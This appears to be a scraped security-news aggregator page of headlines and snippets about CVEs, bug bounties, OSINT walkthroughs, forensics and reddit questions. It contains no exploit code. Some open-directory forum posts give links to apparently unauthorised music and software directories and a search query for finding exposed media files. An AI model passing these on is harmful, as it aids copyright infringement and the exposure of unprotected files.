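    Between Java and C++ stands a high wall built of dynamic memory allocation and garbage collection; those outside want in, while those inside want out. Garbage collection overview The heap and the method area in the Java memory model are what garbage collection needs to focus on, because the other areas are reclaimed automatically when their thread ends. The first goal in solving garbage collection is to determine when an object is no longer needed so that it can be automatically
    [Cao Gong's Notes] Some Thoughts on the Mysql-Connector-Java Time Zone Problem -- Times Written to the Database Are Always 13 Hours Behind - 三国梦回
    Background Last year I wrote a post titled "[Cao Gong's Notes] Why is the time in the Mysql client a full 13 hours off from local time? Ridiculous", and recently it actually came in handy. Not for me, but for a colleague on my team who hit the same thing: a service inserts records into the database, each record contains a time, say time A. After the write, the time in the database is A-13, 13 hours behind. So this one place was changed  ( 1 min )
    『无为则无心』 Python Basics: 44. Working with Files and Folders - 繁华似锦Fighting
    1. Introduction to the os module The os module provides interface functions for most operating system features. Once imported, the os module adapts to the operating system platform and performs the appropriate operations for each platform. In Python programming, the os module handles the file and directory operations we would otherwise do by hand, for example listing all files in the current directory, deleting a file, getting a file's size, and so on. In Python  ( 1 min )
    Tricky Problems: Investigating Blurry Text Caused by transform - ChokCoco
    On our pages we often run into this problem: the text or borders inside a region become very blurry when rendered, as shown below (the data has been anonymized): Normally it should look like this: Hmm, it may not be obvious in the full-size image, but comparing a detail makes it very clear: When is this triggered? So when does this problem occur? On Google we can actually find  ( 1 min )
    LibOpenCM3 (1): Setting Up a Command-Line Development Environment on Linux - Milton
    LibOpenCM3 is a GPL-licensed (LGPL3) firmware library for the Cortex-M series, supporting stm32, atmel and nxp microcontrollers. This firmware library is positioned against CMSIS but provides more method interfaces than CMSIS; its level of implementation sits between CMSIS and SPL. For the common STM32F1 series, the code is already largely sta...  ( 3 min )
    Developing TypeScript with VS Code - 寻找无名的特质
    This article gives an overview of developing TypeScript with VS Code.  ( 1 min )
    Externalized Configuration Management with Environment in Spring, Explained - 跟着Mic学架构
    Environment represents the runtime environment information of the whole spring application, and it contains two key elements: profiles properties profiles I believe everyone already understands the concept of profiles; most commonly it is the solution for deciding which configuration context applies in the current spring container in different environments. For example, for the development env  ( 1 min )
    Building a Web Office Suite from Scratch (4): A New Problem, z-index - 赵康
    Table of contents for the "Building a Web Office Suite from Scratch" blog series This is a blog series whose ultimate goal is to build an HTML Canvas-based Web Office suite similar to Microsoft Office, including documents, spreadsheets, slides... and so on. The corresponding Github repo: https://g  ( 1 min )
    vivo Server-Side Monitoring Architecture: Design and Practice - vivo互联网技术
    1. Business background We live in an age of information explosion. Carried by the internet, information flows freely around the world, giving rise to all kinds of platform and software systems, and ever more business functions also add to system complexity. When a core service has a problem that affects user experience and developers do not notice in time, it is already too late by the time the problem is found; or when a server's CPU usage keeps climbing, the disk fills up, and so on, operations staff need to  ( 1 min )
    Building a Simple .net-Based Microservice E-Commerce System with Dapr (19): Distributed Transactions with the Saga Pattern - a1010
    Earlier articles in this series discussed one way to implement distributed transactions: exposing actor services in the cluster to make distributed transactions locally atomic. But actor services have their own peculiarities and do not fit every scenario. So today I will cover another implementation of distributed transactions, the saga pattern, with code attached at the end for readers to reference and comment on. Contents: 1. Building a simple .net-based micro  ( 1 min )
    Last Week's Highlights (2.14-2.20) - 博客园团队
    Popular posts: · 2021 Year in Review | GrapeCity Software Development Technology Retrospective (Part 2) (葡萄城技术团队)· Architecture Evolution from MVC to DDD (木小丰)· 36,000 Stars! A Rising Open-Source Web Server with Free HTTPS Out of the Box (削微寒)· ASP.NET Core 6 Framework Revealed, Worked Examples [01]: First Programming Experience (Art
    A Self-Hosted Lightweight CI/CD Solution--04-Private Code Repository Service-Gitea - 莫问今朝乄
    Note: all notes in this series are on Github, where you can read them directly. The most popular enterprise-grade private code repository is Gitlab, and at first I also planned to deploy Gitlab as my private code repository. But after deploying it I found that Gitlab uses too many resources; even after tuning it still takes 3g of memory, so in the end I had to abandon that plan. I then discovered G  ( 2 min )
    Microservices from Code to k8s Deployment, the Complete Series (4. User Center) - 万俊峰Kevin
    In this series we walk through a complete microservice practice covering everything from requirements to launch, from code to k8s deployment, and from logging to monitoring. The whole project is developed with go-zero and largely includes go-zero plus some middleware developed by the go-zero authors; the technology stack is essentially go-zero's own in-house components.  ( 1 min )
    Circular Dependencies, Fourth Look → When Circular Dependencies Meet BeanPostProcessor, Love May Blossom! - 青石路
    A moment of fun The day I learned she was getting married, I did not sleep all night. I drove three hundred kilometers to the foot of her building and slowly smoked a cigarette...... It slowly grew cold, firecrackers went off, and the wedding motorcade arrived. She was beautiful in her wedding dress that day, truly beautiful! After I had followed the motorcade for a few kilometers, I got a message from her: stop seeing me off, stop seeing me off, your walking tractor is too loud ...... Recap The author  ( 1 min )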
  • Open

    How To Integrate or Query My Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed In Your Firewall or Security Solution - An Analysis
    Dear blog readers, Did you already pull my public and free STIX STIX2 TAXII threat intelligence feed using your and your organization's Lifetime API Key? In this post I've decided to elaborate more and offer practical advice and links in terms of how you can pull and integrate my daily updated STIX STIX2 TAXII threat intelligence feed in your firewall or security solution and how you can actually use your Lifetime API Key for my feed in Maltego for possible enrichment of your IoCs (Indicators of Compromise). Here's your Lifetime API Key for you and your organization - f8aa0cca-a0ac-4eff-9c03-1c86ad7aee93 Portal: https://ddanchev.ngrok.io API: https://ddanchev.ngrok.io/graphql API Documentation: https://luatix.notion.site/GraphQL-API-cfe267386c66492eb73924ef059d6d59 API Client: https://opencti-client-for-python.readthedocs.io/en/3.3.0/pycti/pycti.html API requirements: https://github.com/amr-cossi/opencti-maltego/blob/master/config.py.sample TAXII Collection: https://ddanchev.ngrok.io/taxii2/root/collections/c2259b20-9c60-4ddd-8931-8de970440f06/objects Bearer Token Authentication Required: https://github.com/OpenCTI-Platform/opencti/issues/1198 Maltego transforms available: - https://www.maltego.com/downloads/ - https://www.maltego.com/transform-hub/opencti/ - https://www.maltego.com/transform-hub/stix/ As always feel free to drop me a line at dancho.danchev@hush.com in case you have any questions. Full list of solutions compatible with STIX STIX2 and TAXII EventLog Analyzer ThreatConnect Azure Sentinel Splunk Cisco Elemendar Cortex XSOAR TrendMicro ArcSight Microsoft Sentinel EventTracker Plixer Scrutinizer Sumo Logic Kaspersky CyberTrace ServiceNow CheckPoint ThreatCloud Carbon Black EDR Cisco Email Gateway ThreatConnect LogPoint Tanium Symantec LogRhythm Infoblox Cloudera Sample screenshots of my STIX STIX2 TAXII Threat Intelligence feed in combination with Maltego: Enjoy!

  • Open

    Inventing Anna, social engineering and OSINT: what is the outlook for the future in terms of security…
    How much personal and intimate information do we disclose on social media, spontaneously and without a second thought? Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 13
    Thirteen. Unlucky for some. Let’s see how you could solve Hacktoria’s practice challenge: Geolocation 13. I confess I was very excited… Continue reading on Medium »  ( 3 min )
  • Open

    Analysis of CVE-2021-36260: Exploited in the Wild Hikvision Camera Vulnerability
    submitted by /u/chicksdigthelongrun [link] [comments]
    rconn - Consume services behind NAT or firewall without opening ports or port-forwarding
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    Running Cobalt Strike BOFs from Python
    submitted by /u/naksyn_ [link] [comments]
  • Open

    Interesting Stored XSS
    Hey there! My name is Faizan and this write up is about an interesting Stored XSS I found earlier today! If you know what an XSS aka Cross… Continue reading on Medium »  ( 1 min )
    Give me a browser, I’ll give you a shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »  ( 3 min )
    Burp Suite Tool — Overview and Usage
    Burp Suite is an intercepting tool which can be used to capture and manipulate all of the data traffic between Client and Server. This… Continue reading on Medium »  ( 2 min )
    Send a Email to me and get kicked out of Google Groups !!
    A Feature that almost broke Google Groups !! Continue reading on InfoSec Write-ups »  ( 3 min )
    How I make money with Hacking …
    Hello Everyone, This is Abhishek Kashniyal, I am a CSE student with specialization in Cyber Security & Forensics, a constant learner and… Continue reading on Medium »  ( 2 min )
    BugBounty: Algolia key disclosure vulnerability
    What is Algolia? Continue reading on Medium »  ( 1 min )
  • Open

    A bunch of rock music
    http://djbloom.info/Music/My%20Music/ submitted by /u/CalmWater8439 [link] [comments]  ( 1 min )
    I'm bad at coding. How do I create an Open Directory from scratch?
    Just what the title says. I have some music, movies, documents, etc that I'd like to share, but I don't want to take up or make an entire Google Drive account just for some files. Any help getting started would be greatly appreciated! submitted by /u/Reggie_Smith_89 [link] [comments]  ( 4 min )
  • Open

    I want to know what a day in a life looks like as an infosec analyst. Also, what would companies look for when hiring a junior infosec analyst
    What would a company look for when hiring junior infosec analysts? I just started as a junior help desk technician and I hear that experience is better than certs. I just want to get an idea of what a company will look for when hiring a junior infosec analyst. Also, is it possible to go from help desk to infosec? submitted by /u/Jkarl0880 [link] [comments]  ( 1 min )
    Any suggestions for gaining resume-worthy experience in cloud security?
    I pivoted from a technical security role to a customer facing technical/management role for a cybersecurity SaaS company a couple years ago. I’ve been considering getting back into the security engineering/architect side of things. One area I’m finding seems to be a requirement for most roles is experience in cloud security like mastery of AWS. I’m also noticing requirements for experience in container tools such as Kubernetes. This isn’t experience I can gain on the job right now. Any suggestions on how I can get experience that matters for these technologies? I don’t want to fall behind and lose any chance of working in a direct security role again submitted by /u/7heJoker [link] [comments]  ( 1 min )
    SAP CVE-2022-22536 technical analysis?
    Anybody by some chance has some sources on the new CVE of score 10 impacting SAP NetWeaver? I can't find any details of the specific vulnerable mechanism that allowed the request smuggling. Thanks :) submitted by /u/Altiverses [link] [comments]  ( 1 min )
    What are the prerequisite skills/knowledge for reverse engineering?
    Trying to learn reverse-engineering and binary exploitation and I came across this playlist. Watched a few videos but didn't get a thing; it feels like I'm missing some knowledge gaps in between. Can someone please give me a clear roadmap so that I can start using Radare2? Edit: after radare, I wanna learn Ghidra lol submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    How is your day as an entry-level SOC
    I have recently interviewed for an entry-level SOC role, and my expectation is a bit mixed. It is a cybersecurity company that provides services such as SIEM monitoring, pen-testing, threat hunting, etc. The X company has 5 people, including the CEO and CTO. And around 300 customers. The role is to sit with the SOC team, check alerts, and then give customers a summary each quarter of what happened within that period. The job title was listed as a cyber security engineer, and the job description mentioned Analysis of security incidents Incident Response Teams Threat Hunting Security advice During the interview, they asked me two times specifically how I felt about giving security advice to customers, is it normal that the junior SOC gives security advice to customers? Or is this a good way to get into the "cyber world", then apply for new jobs after 1 year? Going to graduate with my BS this summer, so trying to land a job before I graduate. submitted by /u/PapiPoseidon [link] [comments]  ( 1 min )
  • Open

    Teasing Master Memory Shell: Servlet Memory Shells
    The final installment on Servlet memory shells, starting straight from loading.  ( 1 min )
  • Open

    SecWiki News 2022-02-20 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Telegram vs Cellebrite
    "Telegram for iOS: Access and decode secret chats which can only be accessed on their devices of origin. You can also recover deleted messages." im in too deep this forensic thingy is kinda exciting and im in a business major. I guess one can really recover deleted telegram chats using cellebrite! amazing submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    Apple iCloud Productions
    What kind of data are included in apple icloud productions ? do they include permanently deleted files notes, media? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    jump from IT Audit into computer forensics
    hello friends to make things short, I am an IT Auditor with 1.5 years of experience, and I hate the part of dealing with people in IT Audit. but its very essential to deal with people there. so decided to jump to forensics, do you people deal with humans or simply have to worry about machines and that is it? and, i am cisa certified, will that help? what certification do you suggest taking for computer forensics? and how is the pay for IT Audit vs Computer forensics? in short, do you recommend the shift or not? thx submitted by /u/ItchyPilot9804 [link] [comments]  ( 2 min )
  • Open

    [Cullinan #27] Improve cullinan and Added more..
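    This is Cullinan log #27. It feels like it has been a while since I posted one. Add category cullinan Add OWASP ZAP Add Insecure Deserialization Change SQLMap (Add scanning to X) ZAP and Insecure Deserialization are newly added, and there were some changes on the SQLMap side. ZAP will probably… get revised very often, since there is just so much to cover 😵‍💫 I am also adding more features across Cullinan as a whole, and as the first step, applying categories is now done. That's all for now 👋🏼
    Insecure Deserialization
    🔍 Introduction Insecure Deserialization means exactly what it says: deserialization that is not safe. Because deserialization can end up deserializing objects the developer never intended, causing business-logic problems or, under certain conditions, making the application execute code the attacker intended, the risk is high. To start with Serialization/Deserialization: in development, converting an Object in memory into external data such as a file is usually called Serialization, and conversely, converting external data such as a file into an Object inside the program is called Deserialization. 🗡 Offensive techniques Detect Without looking at the source code, it is hard to be certain that something is a Deserialization process.
    OWASP ZAP
    Introduction ZAP (Zed Attack Proxy) is an OWASP Flagship project: a security testing tool and vulnerability scanner for Vulnerability Assessment, Penetration Testing, Runtime Testing and Code Review. Along with Burpsuite it is a primary tool for security engineers, bug bounty hunters and others, and because it provides a Cli command, a REST API, a Jenkins plugin, a Github action and more, it is also widely used as a DAST scanner in DevSecOps, that is, in the CI/CD Pipeline. Personally, it is a project I really love. Whatever else, there is no tool that compares for Fuzzer / Scripting. It's the best! Installation Install it using the Installer package for your OS from the URL below.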
  • Open

    Self XSS in Create New Workspace Screen
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1442017 - Bounty: $50
  • Open

    The Red Cross Data Breach Exploited a ManageEngine Vulnerability by APT27
    Article URL: https://www.thecybersecuritytimes.com/the-red-cross-data-breach-exploited-a-manageengine-vulnerability-by-apt27/ Comments URL: https://news.ycombinator.com/item?id=30403952 Points: 1 # Comments: 1  ( 4 min )
  • Open

    Red Team Engagement Planning
    A short article outlining the phases to go through, while planning a red team engagement. Continue reading on Medium »  ( 2 min )

  • Open

    Privilege Escalation Vulnerability in Snapd
    Article URL: https://ubuntu.com/security/notices/USN-4728-1 Comments URL: https://news.ycombinator.com/item?id=30401324 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Printer assigned a drive letter in Windows
    Has anyone else come across a printer that was assigned a drive letter? I’ve never seen this in my personal life but it stood out to me while I was working a case. In this instance, it was a Brother printer assigned to D:. Does doing this provide any additional functionality rather than just printing documents? submitted by /u/ebarboza311 [link] [comments]  ( 1 min )
    Missing $UsnJrnl
    Hi guys what can be the reason to not have a $UsnJrnl on an NTFS filesystem? submitted by /u/Donato_Francesco [link] [comments]  ( 1 min )
  • Open

    The Ultimate Guide to Improving Your Competitive Research on Google
    Want to improve your queries when researching a competitor or your market? Continue reading on Medium »  ( 3 min )
    Phishing Domain Tool — DnsTwist Part 2
    Dnstwist is an open-source tool used to identify phishing domains, Typosquatting domains, attack domains, and brand impersonate. Dnstwist… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 12
    And back again with another Hacktoria Geolocation challenge to solve. I love GEOINT challenges, especially when they force me to learn… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    "The installation of this device is forbidden by system policy"
    I keep getting these notifications without me trying to install any new device or driver. I would like to know what is the source of this? I tried to look into my event viewer without success. submitted by /u/ak_z [link] [comments]  ( 1 min )
    Small matter: A Malwarebytes Privacy Guard and Privacy Badger basically doing the same thing. I've had a problem with my browser sticking and it might be conflicting extensions.
    Thank you. submitted by /u/jacobspartan1992 [link] [comments]  ( 1 min )
    Which framework should I learn or at least get familiar with first? (Ghidra, IDA, Radare2)
    Hey Chief, I'm trying to get ahead in reversing binaries, and I really ain't got any idea about which framework should I pick up first, Can you help? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Soc 2 report
    Why SOC 2 report are made by CPA ? For SOC 1 I get it, but not SOC 2. How can they audit IT security being accountant? submitted by /u/Xctzn [link] [comments]  ( 2 min )
  • Open

    Windows Privilege Escalation: PrintNightmare
    Introduction Print Spooler has been on researcher’s radar ever since Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.  ( 9 min )
  • Open

    SecWiki News 2022-02-19 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Querying Spotlight APIs With JXA
    TL;DR This blog post takes a brief look at how to use JXA (native JavaScript for Automation on macOS) to query Spotlight APIs. In… Continue reading on Medium »  ( 3 min )
    Attacktive Directory — THM
    Attacktive Directory is a box hosted on Try Hack Me. This is medium rated box, but great for any new Red Team Member or penetration… Continue reading on Medium »  ( 2 min )
  • Open

    Directory Traversal — what is it?
    Local File inclusion Continue reading on System Weakness »  ( 3 min )
    PORTSWIGGER WEB SECURITY - SSRF (SERVER SIDE REQUEST FORGERY) LAB SOLUTIONS
    If the data used in a web application is retrieved through an external source and the request the web server has sent is one the attacker… Continue reading on Medium »  ( 7 min )
  • Open

    Certipy 2.0: BloodHound, New Domain Privilege Escalation Techniques, Shadow Credentials, Golden Certificates, and more!
    submitted by /u/ly4k_ [link] [comments]
  • Open

    pictures of people playing motorcycle soccer
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)
    submitted by /u/digicat [link] [comments]
  • Open

    The Lazarus Group Starts Using lolbin Techniques
    Researchers have discovered a new Lazarus attack campaign that uses defense-sector job postings as phishing lures.
  • Open

    Expat library: libexpat 2.4.5 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_5/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30393397 Points: 1 # Comments: 0  ( 21 min )

  • Open

    Microsoft Brings eBPF to Windows unlocking security and networking use cases
    submitted by /u/markcartertm [link] [comments]  ( 1 min )
    Personnel Security, Separation of Duties, Least Privilege, Need to Know, Vendor, Consultant and Contractor Controls, Security Governance, Risk Management
    submitted by /u/Tradition_Wonderful [link] [comments]
    Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine)
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    AWS GuardDuty Exfiltration Bypass with VPC Endpoints
    submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)
    submitted by /u/digicat [link] [comments]
    Extensis Portfolio - Remote Code Execution Vulnerability Disclosure
    submitted by /u/hashput1n [link] [comments]
  • Open

    What is it like to work a computer forensics job?
    How is working for a computer forensics job like? Is it easy as simple as just plugging a hard drive or phone or anything that needs data recovery to retrieve data back or is it much harder and more work? Just wondering because i am a computer science major currently a freshman I might want to do computer forensics because it interests me. submitted by /u/Ill-Date-1852 [link] [comments]  ( 2 min )
    Where do deleted browser history go to?
    I know when u delete something, it never really gets deleted. So just curious, where does cleared browsing history for chrome/safari go to? and are we able to retrieve it? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    How do you really get into incident response
    I have recently graduated from college with a Bachelors in df but the school I went to really was more geared towards what police officers deal with (like criminal activity and all). How should I really go about learning more of the incident response side of forensics? Any good references to YouTube channels, textbooks, websites, etc is much appreciated! submitted by /u/JunketThat2134 [link] [comments]  ( 5 min )
  • Open

    eCPTX Exam Review
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on The Mayor »  ( 4 min )
    AWS GuardDuty Exfiltration Bypass
    In January 20, 2022 Amazon AWS has introduced a new threat detection in GuardDuty to block credential exfiltrations. Can be bypassed? Continue reading on Dev Genius »  ( 4 min )
    AWS GuardDuty Exfiltration Bypass
    In January 20, 2022 Amazon AWS has introduced a new threat detection in GuardDuty to block credential exfiltrations. Can be bypassed? Continue reading on Medium »
  • Open

    Is it possible to bulk download?
    So there's an album I'm wanting to download from an OD (Queen's complete Platinum Collection which includes over 200 mins of music) and I'm wanting to know if there is a way to go and bulk download all the files without having to press a link, right click, and click "Save audio as..." every time. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    Software (Not Tested)
    https://fichiers.meca.polymtl.ca/?hidden submitted by /u/CalmWater8439 [link] [comments]
    Quake 3 Arena/OpenArena maps and other goodies
    submitted by /u/SpaceOtterMafia [link] [comments]  ( 1 min )
    Best way to limit results by language?
    Greetings! I am currently new to the usage of open directories and have been wondering how to limit my results for a movie, for example, to only my language. I am using the "all resources I know" guide to construct my searches. Example: intext:"Search Term" intitle:"index.of" +(wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) The Guide: https://www.reddit.com/r/opendirectories/comments/933pzm/all_resources_i_know_related_to_open_directories/ submitted by /u/TwinkleTheToothFairy [link] [comments]  ( 1 min )
  • Open

    Severe Vulnerability Fixed in UpdraftPlus 1.22.3
    Article URL: https://jetpack.com/2022/02/17/severe-vulnerability-fixed-in-updraftplus-1-22-3/ Comments URL: https://news.ycombinator.com/item?id=30391454 Points: 1 # Comments: 1  ( 4 min )
    Local root vulnerability in snap-confine
    Article URL: https://lwn.net/Articles/885195/ Comments URL: https://news.ycombinator.com/item?id=30381169 Points: 2 # Comments: 0  ( 10 min )
  • Open

    Hacking the marketplace
    Guys! This room it’s great and I had a lot of fun, with this room you can learn this: Continue reading on System Weakness »  ( 2 min )
    Recon and YouTube, is that a thing?
    Hey fella hunters, hope you all are doing fine. This is my first ever blog, I will try to keep it as much simple as possible spilling as… Continue reading on Medium »  ( 4 min )
    How I was able to hack Cambridge University (Arabic)
    Peace be upon you, this is your brother Nasser. Because of your earlier support for me, I decided to write this article Continue reading on Medium »  ( 1 min )
    Bug Zero is Going to Pay Your Security Bill for 2022
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »  ( 2 min )
    Bug Bounties in Sri Lanka
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »  ( 5 min )
    Cardano Foundation Doubles Reward Offered to Hackers for Uncovering Bugs on Its Blockchain
    Continue reading on Medium »  ( 2 min )
    Firefly Security Audit Results
    Original: https://firefly.exchange/blog/results-from-firefly-security-audits Continue reading on Medium »  ( 2 min )
    I’ve made over $588k on Bug Bounty so far
    How much one can earn on Bug Bounty? Continue reading on Medium »  ( 1 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 2 min )
    Starswap’s Second Bug Bounty Program
    Starswap is already live on Starcoin’s test network, barnard, as the first step in realizing our ambitious vision of a fully functional… Continue reading on Medium »  ( 1 min )
  • Open

    Android
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1343528 - Bounty: $3000
  • Open

    Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign
    One of the more common infections that we see are site-wide redirects to spam and scam sites, achieved by attackers exploiting newly found vulnerabilities in popular WordPress plugins. If you’ve ever been redirected to a page that looks something like this, then you’ve fallen victim to such an attack: Once the user clicks through the verification process they are sent to a fake CAPTCHA page asking the user to click to prove they are a human: As we have reported in the past on this type of infection: The goal is to trick visitors into clicking “Allow” when the site asks to subscribe to push notifications. Continue reading Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign at Sucuri Blog.
  • Open

    Free cybersecurity frameworks to try?
    I am just looking around to see if there are any more frameworks I can use to harden our systems. I have already been using the STIG and CIS tools and are about 85% compliant on both. Are there any more free resources I can use to scan against our machines to see if there is anything else I can do to harden them? Thanks submitted by /u/KillingRyuk [link] [comments]  ( 2 min )
    I believe my files were stolen whilst connected to a hacker's personal network, but something doesn't add up. [NSFW]
    So, a friend of mine is in Cybersecurity. I study Cybersecurity and am less advanced in my journey than he is. He's very much into fraud, malware, spyware, etc. So, a few background things - I have anorexia nervosa. He knows this. We have been friends for over 3 years now. We are friends with benefits. We are both meth addicts and I'm heavily dependant on weed. I have an album on my phone containing all my bodychecks. It is stored in the main SD card directory. I have a Samsung Galaxy S20 5G, running Android 11. So one day, he invited me over to record a sex tape. Okay, whatever. So I went to his house, ended up sucking his dick, he finishes. We chat for a bit, I'm in his loungeroom on his couch for a an hour or so. At one point early on I mention that I am downloading a large file onto my phone. He asks if I want to use his Wi-Fi, and I accept. When I'm connecting, he convinces me to use my phone MAC address. Okay. I try to browse the Internet while I wait but the connection is garbage. I recieve a text from our other friend who wants to buy weed off me. He immediately ushers me out the door despite suggestions of a Round 2 earlier. Later that night, I notice that when posting to my Instagram, all the recent photos are my bodychecks. Despite me not having touched that folder at all in the past six months. All the photos are there, twice - in my recent photos and where they originally were. I cannot find any duplicate albums on my phone that would cause this. This all happened last week, but the files were modified again last night. Should I be worried? submitted by /u/856850835 [link] [comments]
    Security Metrics
    So I'm working on a security project now and we have a bunch of issues that need fixing over a number of areas and I need a way of prioritising these items and showing that the security of the system is improving. Normally you would use CVSS to calculate this however this program won't be dealing with just vulnerabilities in the product but also in operations and governance. How do you prioritise updating a library in your product with an RCE against a GDPR issue or an internal tool with weak password policies? Also how do you score the system overall to show that fixing these issues has improved the overall security posture? submitted by /u/dbxp [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-18 Review
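    Attacking TCP Traffic with IP Fragmentation Poisoning by ourren "Red vs. Blue Exercise Scoring System" Open-Source Framework (preview) by ourren The Effectiveness of CSRF Defenses in Web Frameworks by ourren PRIVGUARD: A Data Governance Framework for GDPR Privacy Compliance by ourren The Man in the Middle: An Analysis of Ntlm Relay Attacks by ourren The "Three Protections and One Assessment" You Must Understand for Cybersecurity Work by ourren For more of the latest articles, visit SecWiki  ( 2 min )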
  • Open

    Hacktoria: Geolocation 10 (Walkthrough)
    Hacktoria: Geolocation 10 (Walkthrough) Continue reading on Medium »  ( 2 min )
    Tattoos for Buildings — OSINT Challenge 17
    On Jan 24, 2022, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »  ( 2 min )
    OSINT: How extract text From an Image or Video
    Did you ever wonder what a piece of foreign text means on a sign, banner, or in a video? Sure you can type it into google translate or speak… Continue reading on Medium »  ( 2 min )
  • Open

    How Netsparker can help with AppSec compliance
    Demonstrating web application compliance with various security standards and practices is crucial in many industries. To help you scan applications and prepare reports for common web security compliance requirements, Netsparker by Invicti comes with a host of predefined compliance checks and reports, including OWASP Top 10, PCI DSS, HIPAA, NIST SP 800-53, and more. READ MORE  ( 7 min )
  • Open

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!  ( 3 min )
    CyberDefenders Qradar101 Write-up
    This write-up is based on Cyberdefenders Qradar101 challenge from Ali Alwashali.  ( 7 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
  • Open

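    FreeBuf Morning News | Meta pays US$90 million over privacy case; Google launches new privacy protection policy
    Facebook's parent company Meta has agreed to pay US$90 million to settle a lawsuit dating back ten years.  ( 1 min )
    A Golang-based botnet is becoming a new threat
    Cybersecurity researchers recently cracked a new botnet named Kraken. The botnet is developed in Golang, and hackers are actively optimizing and upgrading it.
    Google announces it will bring the "Privacy Sandbox" to Android
    Google announced on Wednesday that it plans to bring the Privacy Sandbox to Android, with the aim of extending advertising technology that is both privacy-focused and non-intrusive for users to the mobile web.
    Ransomware runs rampant: 623 million detections in 2021
    IoT malware, encrypted threats, and cryptojacking all maintained rapid growth throughout the year.  ( 1 min )
    FreeBuf Weekly | Internet Society data leak; Ukraine hit by large-scale DDoS attack
    The Security Service of Ukraine (SSU) stated that this cyberattack against Ukraine was a premeditated, organized operation with a large "hidden hand" behind it.  ( 1 min )
    Hackers infiltrate Microsoft Teams to send malware
    Hackers are abusing Microsoft Teams and spreading malicious executables in chats.
    One slip gives it away: Transparent Tribe and SideCopy exposed by shared infrastructure
    Quick Heal disclosed an espionage operation targeting Indian defense forces and armed forces army personnel and named it Operation SideCopy.
    FreeBuf enterprise-side group discussion | Personal data privacy in enterprise security operations
    As an enterprise security department, while keeping the business running securely and stably, how do you protect the private data of every "transparent person" in the age of platform data?
    A giant gives ground! Meta to pay US$90 million
    The case alleges that Meta used cookies to track Facebook users who had logged out of their accounts.  ( 1 min )
    Hackers say they are very interested in your vibrator
    Vibrators and massage wands are your late-night companions, and they may also be quietly leaking your usage data.  ( 1 min )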
  • Open

    Why symbolic execution is the leading-edge method for generating test values
    In the first blog post of our blog series on Symflower’s Core Technology, we explained how symbolic execution works and how we apply it to… Continue reading on Medium »  ( 5 min )
  • Open

    Watch "C0V3RT - "Just For Fun" Challenge Lock (Picked & Gutted)" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
  • Open

    Internals of Go's new fuzzing system
    Article URL: https://jayconrod.com/posts/123/internals-of-go-s-new-fuzzing-system Comments URL: https://news.ycombinator.com/item?id=30380994 Points: 2 # Comments: 0  ( 6 min )

  • Open

    Would you support brain forensics (mind reading)
    Poll View Poll submitted by /u/themariocrafter [link] [comments]  ( 1 min )
    Who is running sysmon on workstations and forwarding to SIEM?
    Hi Just wondering if any enterprise size companies are running sysmon on workstation and/or servers and forwarding the event to some sort of logger/SIEM? What are the pros and cons? submitted by /u/antmar9041 [link] [comments]  ( 1 min )
    PDF Analysis for adult content
    I have a PDF that consists of ~27,000 pages and >42,000 images (it's a Cellebrite extraction report from an iPhone). I need to know how many of the images are "adult" in nature. I know Google (https://cloud.google.com/vision/docs/detecting-safe-search) and Microsoft (https://docs.microsoft.com/en-us/azure/cognitive-services/computer-vision/concept-detecting-adult-content) both have "A.I." based image filtering API's that can automatically scan images and find adult/gore/explicit images, but I'm not aware of any software that leverages these technologies (or something similar). What I'm looking for: 1. The best way to dump this many images from a PDF file, and 2. The best way to scan that dump for explicit images (or a way to just scan the PDF file directly and skip dumping the images). submitted by /u/agrowland [link] [comments]  ( 3 min )
  • Open

    How to track vehicles using Open Souce Imagery
    Vehicle information can be a fantastic tool for investigators to scrutinize and track a real world target, but what OSINT opportunities can… Continue reading on Medium »  ( 2 min )
    Hacktoria: Geolocation 14 (Walkthrough)
    Hacktoria: Geolocation 14 (Walkthrough) Continue reading on Medium »  ( 3 min )
